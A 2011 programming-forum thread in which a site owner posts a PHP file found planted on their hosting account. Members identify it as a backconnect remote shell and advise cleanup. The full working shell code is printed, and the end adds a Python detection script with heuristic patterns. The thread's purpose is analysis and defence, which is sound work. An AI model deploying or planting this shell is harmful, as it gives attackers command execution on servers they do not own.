
Suspicious code?

Discussion in 'General Programming Chat' started by lossehelin, Jun 19, 2011.

  1. lossehelin

    lossehelin Junior Member

    Joined:
    May 23, 2009
    Messages:
    195
    Likes Received:
    47
    Hi guys. Need a bit of insight about one thing. Today justhost suspended my account, and the report stating why they suspended my account showed that one of my files was taking up too many resources. I looked at the file and I thought that it didn't quite belong to my site. I checked one of my backups to see if it was present there, but it wasn't.

    Now I want to know what the code means. I would appreciate it if someone who can read PHP could tell me what the code does:

    Code:
    <?php
    error_reporting (0);
    set_time_limit (0);
    ignore_user_abort (1);
    ob_implicit_flush ();
    define ('_REVSTECK_MSG_SHELL_', ':');
    function RSTRevSteck () {
    function RSTShellMsg ()
    {
    $rstmsg = _REVSTECK_MSG_SHELL_;
    $rstmsg .= shell_exec ('pwd');
    $rstmsg = str_replace ("\n", '', $rstmsg);
    $rstmsg = str_replace ("\r", '', $rstmsg);
    $rstmsg .= '$';
    return ($rstmsg);
    }
    $rsthost = $_REQUEST['rstip'];
    $rstporta = $_REQUEST['rstpo'];
    $rstflag = 1;
    if (!$rsthost) { $rsthost = $_SERVER['REMOTE_ADDR']; }
    if (!$rstporta) { die ('Porta nao informada.'); }
    $rstcon = fsockopen ($rsthost, $rstporta, $rsterrno, $rsterrstr, 1);
    if (!$rstcon) {
    echo 'Erro na linha '.__LINE__.': '.$rsterrstr.' ';
    echo $rsterrno."<br />\n\r";
    die;
    }
    while ($rstflag) {
    $rstbuf = fgets ($rstcon, 1024);
    if (!$rstbuf = trim ($rstbuf)) { continue; }
    if ($rstbuf == 'exit') {
    unset ($rstflag);
    break;
    }
    if (substr_count ($rstbuf, "cd") && strpos ($rstbuf, " ") == 2) {
    $rstexe = chdir (str_replace ("cd ", "", $rstbuf));
    } else {
    if (substr_count ($rstbuf, "ls") && ((
    strpos ($rstbuf, " ") == 2) ||
    strlen ($rstbuf) == 2)) {
    }
    $rstbuf .= " 2>&1";
    $rstexe = shell_exec ($rstbuf);
    $rstexe = str_replace ("\n", "\n\r", $rstexe);
    fwrite ($rstcon, $rstexe, strlen ($rstexe));
    }
    $rstmsgRet = RSTShellMsg();
    fwrite ($rstcon, $rstmsgRet, strlen ($rstmsgRet));
    }
    fclose ($rstcon);
    }
    RSTRevSteck ();
    ?>
     
  2. seeplusplus

    seeplusplus Power Member

    Joined:
    Aug 18, 2008
    Messages:
    517
    Likes Received:
    165
    Not too sure myself, but the first thing it is doing is turning off error reporting, then sets the script to run indefinitely (probably why your host doesn't like it), then sets the script to ignore attempts to stop it (your user account). Then opens a socket to use the internet to (I assume send) what it collects, which seems to be done via a shell.
     
  3. m4dm4n

    m4dm4n Regular Member

    Joined:
    Sep 15, 2010
    Messages:
    223
    Likes Received:
    92
    Occupation:
    /dev/full
    Location:
    /dev/urandom
    That is a backconnect shell.
     
  4. other_henry

    other_henry Junior Member

    Joined:
    Jun 1, 2011
    Messages:
    107
    Likes Received:
    19
    Occupation:
    Freelance coder, server guy
    Location:
    US
    The details of the code aren't important. If that isn't your file, then you have been hacked.

    It looks like you need to delete files, change passwords, etc. after you figure out how they hacked you.

    Good luck
     
  5. lossehelin

    lossehelin Junior Member

    Joined:
    May 23, 2009
    Messages:
    195
    Likes Received:
    47
    Yeah, that is true. I need to check my logs.
     
  6. coderjeff

    coderjeff Junior Member

    Joined:
    Nov 20, 2007
    Messages:
    130
    Likes Received:
    26
    Location:
    USA
    It's a remote shell which allows someone to use it to execute shell commands on your server.

    I suggest that you edit your original post to remove the code. No sense encouraging people to attack other servers.
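As an added illustration (not code from the thread or from any poster), here is a small Python triage script along the lines of what lossehelin and other_henry describe: it scores PHP files by the combination of traits the replies point out (error suppression, unlimited runtime, ignoring client abort, an outbound socket, shell execution, request-controlled input) and treats absence from a known-clean backup as corroborating evidence. The indicator weights, the threshold and the two sample files are constructed for this example.

```python
import re

# Heuristic indicators modelled on the functions the posted script calls; weights are this example's own.
INDICATORS = [
    (r"error_reporting\s*\(\s*0\s*\)", 1, "silences PHP errors"),
    (r"set_time_limit\s*\(\s*0\s*\)", 1, "removes the execution time limit"),
    (r"ignore_user_abort\s*\(\s*(1|true)\s*\)", 1, "keeps running after the client disconnects"),
    (r"\bfsockopen\s*\(", 2, "opens an outbound TCP connection"),
    (r"\b(shell_exec|exec|system|passthru|popen|proc_open)\s*\(", 3, "runs shell commands"),
    (r"\$_(REQUEST|GET|POST)\s*\[", 1, "reads request-controlled input"),
]
THRESHOLD = 6             # a file scoring at or above this is reported
NOT_IN_BACKUP_WEIGHT = 2  # a file missing from a known-clean backup is more suspicious

def score_php(source):
    """Return (score, [matched indicator descriptions]) for one PHP source string."""
    score, hits = 0, []
    for pattern, weight, desc in INDICATORS:
        if re.search(pattern, source):
            score += weight
            hits.append(desc)
    return score, hits

def triage(files, backup_names):
    """files: {filename: source}; backup_names: filenames present in a clean backup.
    Returns {filename: {"score": int, "reasons": [str]}} for files at or above THRESHOLD."""
    findings = {}
    for name, source in files.items():
        score, reasons = score_php(source)
        if name not in backup_names:
            score += NOT_IN_BACKUP_WEIGHT
            reasons.append("absent from clean backup")
        if score >= THRESHOLD:
            findings[name] = {"score": score, "reasons": reasons}
    return findings

# Constructed sample inputs (not files from the original thread).
BENIGN_SAMPLE = """<?php
$name = htmlspecialchars($_POST['name']);
mail('owner@example.com', 'Contact form', $name);
"""
SUSPICIOUS_SAMPLE = """<?php
error_reporting (0);
set_time_limit (0);
ignore_user_abort (1);
$c = fsockopen ($_REQUEST['rstip'], $_REQUEST['rstpo']);
fwrite ($c, shell_exec ('pwd'));
"""
SAMPLE_FILES = {"contact.php": BENIGN_SAMPLE, "rst.php": SUSPICIOUS_SAMPLE}
BACKUP_NAMES = {"contact.php", "index.php"}
```

Run `triage` over a directory of PHP sources plus the file list from a backup taken before the incident; a hit is a starting point for the log review, not proof on its own, since legitimate admin tools also call these functions.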